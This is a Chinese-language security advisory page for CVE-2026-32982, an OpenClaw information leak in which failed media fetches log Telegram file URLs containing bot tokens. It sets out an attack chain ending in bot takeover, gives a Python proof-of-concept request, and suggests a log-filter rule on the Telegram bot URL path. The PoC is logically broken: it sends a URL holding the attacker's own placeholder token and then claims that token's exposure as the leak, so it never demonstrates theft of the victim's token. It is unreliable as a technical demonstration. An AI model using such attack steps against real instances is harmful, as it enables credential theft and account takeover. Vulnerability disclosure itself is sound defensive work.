CVE-2026-32982 CVSS 7.5 高危

CVE-2026-32982 OpenClaw信息泄露漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32982

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.13之前版本存在信息泄露漏洞。当fetchRemoteMedia函数处理媒体下载失败时，错误处理机制会将包含Telegram Bot Token的原始URL直接嵌入错误消息并记录到日志中。攻击者无需认证即可通过日志获取敏感Token，导致Bot被接管。

技术细节

该漏洞源于OpenClaw在处理媒体资源获取时的异常处理逻辑缺陷。在fetchRemoteMedia函数中，若下载远程媒体（如Telegram文件）失败，系统会抛出MediaFetchError。由于代码未对敏感参数进行脱敏，构造错误消息时直接引用了请求源URL。Telegram文件API URL通常格式为'https://api.telegram.org/file/bot<TOKEN>/<path>'，导致Token随错误日志泄露。攻击者只需诱使Bot处理无效媒体请求，或通过监控公开的错误日志接口，即可提取Token并完全控制Bot账户，执行任意API操作。

攻击链分析

STEP 1

1. 触发错误

攻击者向OpenClaw服务发送请求，指定一个不存在或无法访问的远程媒体文件URL。

STEP 2

2. 生成异常

OpenClaw尝试下载文件失败，fetchRemoteMedia函数抛出MediaFetchError异常。

STEP 3

3. 信息泄露

系统将包含完整Telegram API URL（内含Bot Token）的错误信息记录到日志文件。

STEP 4

4. 获取凭证

攻击者访问日志文件（若日志公开或通过其他途径获取）并提取Bot Token。

STEP 5

5. 接管控制

攻击者利用获取的Token通过Telegram Bot API控制Bot，发送消息或获取用户数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept: Triggering the error to leak token
# This script simulates sending a request that causes a media fetch failure.

import requests

target_url = "https://example-openclaw-instance.com/api/media"
# Malicious payload pointing to a non-existent file to trigger error
payload = {
    "media_url": "https://api.telegram.org/file/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/invalid_file.jpg"
}

try:
    response = requests.post(target_url, json=payload)
    # If the server logs errors or returns them in the response:
    print("Response:", response.text)
except Exception as e:
    print(e)

# Expected behavior in vulnerable version:
# Logs or response contains: 'Failed to fetch https://api.telegram.org/file/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/invalid_file.jpg'
# The token '123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11' is now exposed.

影响范围

OpenClaw < 2026.3.13

防御指南

临时缓解措施

建议立即升级到修复版本。若无法升级，应配置日志过滤规则，拦截包含'api.telegram.org/file/bot'的日志条目，并严格限制日志访问权限。同时，建议轮换已暴露的Telegram Bot Token。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表